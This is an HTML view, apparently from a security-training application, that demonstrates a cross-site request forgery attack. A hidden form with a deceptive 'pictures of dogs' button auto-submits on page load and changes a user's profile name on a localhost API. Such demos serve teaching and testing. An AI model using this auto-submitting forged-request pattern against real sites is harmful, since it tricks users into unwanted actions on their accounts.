<section id="csrf-view" class="mainbar">
    <section class="matter">
        <div class="container">
            <div class="row">
                <div class="col-md-12">
                    <div class="widget wblue">
                        <div ht-widget-header title="The CSRF Attack"
                             allow-collapse="true"></div>
                        <div class="widget-content text-center text-info">
                            <form action="https://localhost:8001/api/user/profile" method="POST">
                                <input type="hidden" name="firstName" value="Evil"></input>
                                <input type="hidden" name="lastName" value="Hacker"></input>
                                <input type="submit" value="Click to view awesome pictures of dogs!"/>
                            </form>
                        </div>
                        <div class="widget-foot">
                            <div class="clearfix"></div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </section>
    <script>
        document.forms[0].submit();
    </script>
</section>
